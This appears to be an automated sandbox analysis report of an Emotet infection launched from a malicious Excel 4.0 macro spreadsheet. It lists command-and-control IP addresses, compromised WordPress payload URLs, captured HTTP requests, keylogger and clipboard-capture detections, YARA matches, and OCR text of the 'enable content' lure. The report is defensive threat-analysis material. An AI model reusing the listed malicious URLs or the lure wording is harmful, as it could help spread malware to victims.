Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEe
Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEezOwG
Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://74.207.230.120/O
Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://74.207.230.120/d
Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXM
Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMcsv%lwG
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ecobaby.pi-dh.com/Serend
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lastregaristorante.com/w
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mypurealsystem.com/App_S
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mypurealsystem.com/App_Start/Rhh8lKO/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mypurealsystem.com/App_Start/Rhh8lKO/PE3
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oculusvisioncare.com/wp-
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vn.minin
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vn.minino.com/wp-admin/c
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vn.minino.com/wp-admin/c3WQa/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vn.minino.com/wp-admin/c3WQa/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: tamiladsense.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10012C30 _memset,connect,_strcat,send,recv, 11_2_10012C30
Source: global traffic HTTP traffic detected: GET /ee/ss/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ee/ss/se.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1Host: tamiladsense.comConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 74.207.230.120
Source: unknown TCP traffic detected without corresponding DNS query: 74.207.230.120
Source: unknown TCP traffic detected without corresponding DNS query: 74.207.230.120
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: unknown TCP traffic detected without corresponding DNS query: 139.196.72.155
Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 13_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 17.2.rundll32.exe.27d0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.25b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3090000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2880000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.880000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2db0000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2760000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.860000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a90000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2e10000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2db0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.e80000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.d80000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.e50000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2eb0000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2db0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.29a0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2800000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b30000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.e50000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.c20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.730000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2900000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.600000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2900000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2fc0000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.860000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2800000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.29a0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.ce0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27d0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e40000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2800000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27d0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2fc0000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e90000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b00000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.28d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d50000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a90000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.28d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e40000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2eb0000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d80000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.830000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d10000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3030000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2cf0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3060000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2830000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d50000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b30000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2830000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a10000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26d0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.ce0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d10000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ee0000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.31.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2db0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\Milossd.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: DOCUMENT_2801.xls Macro extractor: Sheet: Macro3 contains: mshta
Source: DOCUMENT_2801.xls Macro extractor: Sheet: Macro3 contains: mshta
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 Previewing is not available for protected documents. 14 15 Yo
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 ,, Previewing is not available for protected documents. L, 14
Source: Screenshot number: 8 Screenshot OCR: protected documents. L, 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23 24 25 26 27 28 2
Document contains OLE streams with names of living off the land binaries
